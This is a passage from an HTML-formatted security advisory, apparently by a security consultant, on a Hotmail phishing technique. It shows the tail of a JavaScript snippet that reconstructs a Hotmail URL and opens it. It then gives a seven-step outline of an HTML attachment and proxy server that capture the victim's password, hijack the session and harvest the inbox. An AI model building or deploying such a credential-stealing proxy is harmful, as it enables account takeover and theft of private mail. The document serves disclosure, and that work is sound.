style='font-size:10.0pt'>str6=str4[2];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str7=str6.split("=");<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str8=str7[1];<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str9="&msgread=&etype=&wo=";<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>str10=str5+str8+str9+"&"+str4[0]+"&"+str4[1]<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>window.open(str10);<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></script><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>hola napa<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></body><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'></html><o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face="Times New Roman"><span lang=EN-GB
style='font-size:10.0pt'>_______________________________________________________________________________<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-indent:18.0pt'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ul style='margin-top:0cm' type=disc>
<li class=MsoNormal style='mso-list:l2 level1 lfo2'><b><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt;
font-weight:bold'>Reach<o:p></o:p></span></font></b></li>
</ul>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt;font-weight:bold'><o:p> </o:p></span></font></b></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>Imagine this situation.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>This is a proof-of-concept scenario.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>This is just a
test and an example; other approaches could be more dangerous, but I do not
intend to expose them. The PoC of the application I mention will also not be
released, for security reasons.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>______________________________________________________________________<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>More than 50% of users could fall for this.<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=1 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>A
user opens an HTML attachment from a friend.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='margin-left:18.0pt;text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=2 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The
window opens, and all the user sees is Hotmail, with a Hotmail URL, asking
again just for the password, because the session remembers the current mail
account.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=3 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>In
the background, the attachment uses frames so that the URL the user sees does
not change, reads the original URL, and calls an application on a server with
that URL as a parameter.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='margin-left:18.0pt;text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=4 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>That
server requests the Hotmail page using the URL, reconstructed to call the same
message.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=5 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Hotmail
responds with the login page, but asks only for the password.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=6 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The
application on the server acts as a proxy, rewriting the POST or GET actions
to point at the server application, so that the username and password are sent
to it as new parameters.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<ol style='margin-top:0cm' start=7 type=1>
<li class=MsoNormal style='text-align:justify;mso-list:l1 level1 lfo3'><font
size=3 face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>The
server logs in as the user and keeps acting as a proxy for the whole session,
or until the user closes the window, logging all the session information. Or
it simply sends a page with a close statement once the password has been
logged.<o:p></o:p></span></font></li>
</ol>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span lang=EN-GB style='font-size:12.0pt'>Normal users
do not see the difference, but we already have all the information needed to
use the victim's account. Or the application can simply spider their inbox and
save it to a database.<o:p></o:p></span></font></p>
<p class=MsoNormal style='text-align:justify'><font size=3
face="Times New Roman"><span style='font-size:12.0pt'>______________________________________________________________________<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span style='font-size:
12.0pt'><o:p> </o:p></span></font></p>
<p class=MsoNormal><b><font size=3 face="Times New Roman"><span
style='font-size:12.0pt;font-weight:bold'>Luis Alberto Cortes Zavala<o:p></o:p></span></font></b></p>
<p class=MsoNormal><i><font size=3 color="#3366ff" face="Times New Roman"><span
lang=EN-GB style='font-size:12.0pt;color:#3366FF;font-style:italic'>Senior
Security Consultant<o:p></o:p></span></font></i></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>luis.cortes@hypersec.co.uk<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=3 face="Times New Roman"><span lang=EN-GB
style='font-size:12.0pt'>http://www.hypersec.co.uk<o:p></o:p></span></font></p>
<p class=MsoNormal><font size=2 face=Arial><span lang=EN-GB style='font-size:
10.0pt;font-family:Arial'><o:p> </o:p></span></font></p>
</div>
</body>
</html>